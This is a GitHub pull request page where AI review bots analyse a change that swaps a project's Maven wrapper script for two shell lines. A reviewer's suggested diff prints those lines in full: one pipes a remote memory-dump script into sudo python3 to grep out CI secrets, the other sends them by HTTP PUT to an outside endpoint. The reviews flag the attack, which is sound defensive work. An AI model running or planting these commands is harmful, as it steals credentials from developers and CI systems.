change mvnw

[playground-nils]

Pull Request Template

What does this PR do?

[gemini-code-assist]

Summary of Changes

Hello, I'm Gemini Code Assist¹! I'm currently reviewing this pull request and will post my feedback shortly. In the meantime, here's a summary to help you and other reviewers quickly get up to speed!

This pull request fundamentally alters the project's build process by replacing the Maven Wrapper script (mvnw) with a highly suspicious and potentially malicious script. The new script is designed to download and execute an external Python script with elevated privileges, extract sensitive information from the system, and subsequently transmit this data to an external endpoint. This change introduces a critical security vulnerability, enabling unauthorized data collection and exfiltration.

Highlights

• Complete Script Replacement: The entire content of the mvnw script has been replaced, removing the standard Maven Wrapper functionality.
• Malicious Script Injection: The new mvnw script downloads and executes an external Python script (memdump.py) with sudo privileges.
• Data Exfiltration: The executed Python script's output is parsed to extract potential secrets, which are then sent via an HTTP PUT request to an external server.

🧠 New Feature in Public Preview: You can now enable Memory to help Gemini Code Assist learn from your team's feedback. This makes future code reviews more consistent and personalized to your project's style. Click here to enable Memory in your admin console.

Changelog

• mvnw
  • Replaced the entire Maven Wrapper script with a new script that performs data exfiltration.

Using Gemini Code Assist

The full guide for Gemini Code Assist can be found on our documentation page, here are some quick tips.

Invoking Gemini

You can request assistance from Gemini at any point by creating a comment using either /gemini <command> or @gemini-code-assist <command>. Below is a summary of the supported commands on the current page.

Feature	Command	Description
Code Review	/gemini review	Performs a code review for the current pull request in its current state.
Pull Request Summary	/gemini summary	Provides a summary of the current pull request in its current state.
Comment	@gemini-code-assist	Responds in comments when explicitly tagged, both in pull request comments and review comments.
Help	/gemini help	Displays a list of available commands.

Customization

To customize Gemini Code Assist for GitHub experience, repository maintainers can create a configuration file and/or provide a custom code review style guide (such as PEP-8 for Python) by creating and adding files to a .gemini/ folder in the base of the repository. Detailed instructions can be found here.

Limitations & Feedback

Gemini Code Assist may make mistakes. Please leave feedback on any instances where its feedback is incorrect or counter productive. You can react with 👍 and 👎 on @gemini-code-assist comments. If you're interested in giving your feedback about your experience with Gemini Code Assist for Github and other Google products, sign up here.

You can also get AI-powered code generation, chat, as well as code reviews directly in the IDE at no cost with the Gemini Code Assist IDE Extension.

Footnotes

1. Review the Privacy Notices, Generative AI Prohibited Use Policy, Terms of Service, and learn how to configure Gemini Code Assist in GitHub here. Gemini can make mistakes, so double check it and use code with caution. ↩

[coderabbitai]

Walkthrough

The mvnw Maven wrapper script has been replaced with a two-line payload. The original Maven initialization logic including shell-based environment setup, path resolution, and wrapper execution has been removed. The new code executes a Python operation that fetches data from a URL, processes it to a file, and sends it via HTTP PUT request.

Changes

Cohort / File(s)	Summary
Maven Wrapper Script mvnw	Replaced 316 lines of Maven wrapper initialization and execution logic with a 2-line Python payload that performs URL-based data retrieval, file writing, and HTTP transmission operations.

Estimated code review effort

🎯 5 (Critical) | ⏱️ ~120 minutes

🚥 Pre-merge checks | ✅ 1 | ❌ 2

❌ Failed checks (1 warning, 1 inconclusive)

Check name	Status	Explanation	Resolution
Description check	⚠️ Warning	The PR description only contains an empty pull request template with no actual description of the changes provided by the author.	Complete the PR description with a clear explanation of what changes were made and why they were necessary.
Title check	❓ Inconclusive	The title 'change mvnw' is vague and generic, providing no meaningful information about what was actually changed in the mvnw file.	Provide a more descriptive title that specifies the actual changes, such as 'Replace mvnw with data exfiltration script' or similar.

✅ Passed checks (1 passed)

Check name	Status	Explanation
Docstring Coverage	✅ Passed	No functions found in the changed files to evaluate docstring coverage. Skipping docstring coverage check.

_{✏️ Tip: You can configure your own custom pre-merge checks in the settings.}

✨ Finishing Touches

🧪 Generate unit tests (beta)

• Create PR with unit tests
• Post copyable unit tests in a comment

Tip

Try Coding Plans. Let us write the prompt for your AI agent so you can ship faster (with fewer bugs).
Share your feedback on Discord.

---

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

• X
• Mastodon
• Reddit
• LinkedIn

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[gemini-code-assist]

Code Review

This pull request completely replaces the mvnw script with malicious code, introducing a critical security vulnerability. The new script is designed to download and execute an external Python script with root privileges, allowing it to extract sensitive information and exfiltrate it to an untrusted server. This constitutes a severe security breach and the changes must be rejected immediately, followed by a thorough security audit.

[gemini-code-assist]

The mvnw script has been replaced with malicious commands that download and execute an external Python script (memdump.py) from raw.githubusercontent.com with root privileges (sudo). This script is designed to extract potential secrets (e.g., by grepping for patterns like "isSecret":true) and exfiltrate them to an external URL (https://bachelor-thesis-001.proxy.beeceptor.com). This allows an attacker to steal sensitive information from the environment where this script is executed. Revert the changes to mvnw to its original, safe state and investigate the source of this pull request.

[gemini-code-assist]

This command sends the content of /tmp/secrets (which is populated by the previous command with potentially sensitive data) to an external, untrusted endpoint (https://bachelor-thesis-001.proxy.beeceptor.com). This constitutes a critical information disclosure vulnerability, as it exfiltrates sensitive data from the system to a third party. This action is highly suspicious and indicative of malicious intent.

[coderabbitai]

Actionable comments posted: 1

🤖 Prompt for all review comments with AI agents

Verify each finding against the current code and only fix it if needed.

Inline comments:
In `@mvnw`:
- Around line 1-2: The mvnw file has been replaced with malicious commands (the
curl ... | sudo python3 pipeline, writing to /tmp/secrets, and the curl PUT to
the beeceptor URL) — revert mvnw to a known-good Maven Wrapper script by
restoring the original mvnw content or regenerating the wrapper using the
official Maven wrapper (e.g., run mvn -N io.takari:maven:wrapper or retrieve the
canonical mvnw from a trusted source), remove the two malicious lines
referencing /tmp/secrets and the remote PUT, close/reject this PR, and as
immediate incident steps rotate any potentially exposed credentials/tokens and
audit CI runners and logs for execution of this compromised mvnw.

---

ℹ️ Review info

Configuration used: Organization UI

Review profile: CHILL

Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 2d39fe7 and 835dc69.

📒 Files selected for processing (1)

• mvnw

[coderabbitai]

⚠️ Potential issue | 🔴 Critical

🧩 Analysis chain

🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "=== Step 1: Inspect mvnw file (first 100 lines) ==="
if [ -f mvnw ]; then
  wc -l mvnw
  echo "---"
  head -100 mvnw
else
  echo "mvnw file not found"
fi

echo ""
echo "=== Step 2: Check file permissions and metadata ==="
ls -la mvnw 2>/dev/null || echo "mvnw not found"

echo ""
echo "=== Step 3: Scan for suspicious patterns ==="
rg -n --hidden -S 'beeceptor\.com|raw\.githubusercontent\.com|memdump\.py|/tmp/secrets' . 2>/dev/null || echo "No suspicious patterns found"

echo ""
echo "=== Step 4: Locate wrapper-related files ==="
fd -H '(mvnw|mvnw\.cmd|maven-wrapper\.properties|gradlew)' . 2>/dev/null | head -20

Repository: nilsreichardt/java-design-patterns

Length of output: 6037

---

🏁 Script executed:

#!/bin/bash
set -euo pipefail

echo "=== mvnw.cmd (first 50 lines) ==="
head -50 mvnw.cmd

echo ""
echo "=== .mvn/wrapper/maven-wrapper.properties ==="
cat .mvn/wrapper/maven-wrapper.properties

Repository: nilsreichardt/java-design-patterns

Length of output: 3616

---

Blocker: mvnw is replaced with RCE + secret exfiltration (do not merge).

Line 1 executes untrusted remote code (curl ... | sudo python3), attempts to extract secrets into /tmp/secrets, and Line 2 exfiltrates them via HTTP PUT. This is not Maven Wrapper behavior and is a critical supply-chain compromise vector affecting any developer/CI that runs ./mvnw.

Immediate required actions:

• Reject/close this PR and restore mvnw to a trusted Maven Wrapper script (regenerate from a known-good source).
• Treat as a potential incident: rotate credentials/tokens that may have been present in env/CI, and audit CI logs/runners.

Proposed immediate safety patch (prevents accidental execution; replace with real wrapper ASAP)

-curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' >> /tmp/secrets
-curl -X PUT -d `@/tmp/secrets` https://bachelor-thesis-001.proxy.beeceptor.com
+#!/bin/sh
+set -eu
+echo "ERROR: mvnw appears to have been tampered with. Regenerate Maven Wrapper from a trusted source." >&2
+exit 1

Note: mvnw.cmd and .mvn/wrapper/maven-wrapper.properties remain uncompromised and contain legitimate Apache Maven wrapper code, indicating this is a deliberate Unix-specific attack.

📝 Committable suggestion

‼️ IMPORTANT
Carefully review the code before committing. Ensure that it accurately replaces the highlighted code, contains no missing lines, and has no issues with indentation. Thoroughly test & benchmark the code to ensure it meets the requirements.

Suggested change

	curl -sSf https://raw.githubusercontent.com/AdnaneKhan/Cacheract/b0d8565fa1ac52c28899c0cfc880d59943bc04ea/assets/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' >> /tmp/secrets
	curl -X PUT -d @/tmp/secrets https://bachelor-thesis-001.proxy.beeceptor.com
	#!/bin/sh
	set -eu
	echo "ERROR: mvnw appears to have been tampered with. Regenerate Maven Wrapper from a trusted source." >&2
	exit 1

🤖 Prompt for AI Agents

Verify each finding against the current code and only fix it if needed.

In `@mvnw` around lines 1 - 2, The mvnw file has been replaced with malicious
commands (the curl ... | sudo python3 pipeline, writing to /tmp/secrets, and the
curl PUT to the beeceptor URL) — revert mvnw to a known-good Maven Wrapper
script by restoring the original mvnw content or regenerating the wrapper using
the official Maven wrapper (e.g., run mvn -N io.takari:maven:wrapper or retrieve
the canonical mvnw from a trusted source), remove the two malicious lines
referencing /tmp/secrets and the remote PUT, close/reject this PR, and as
immediate incident steps rotate any potentially exposed credentials/tokens and
audit CI runners and logs for execution of this compromised mvnw.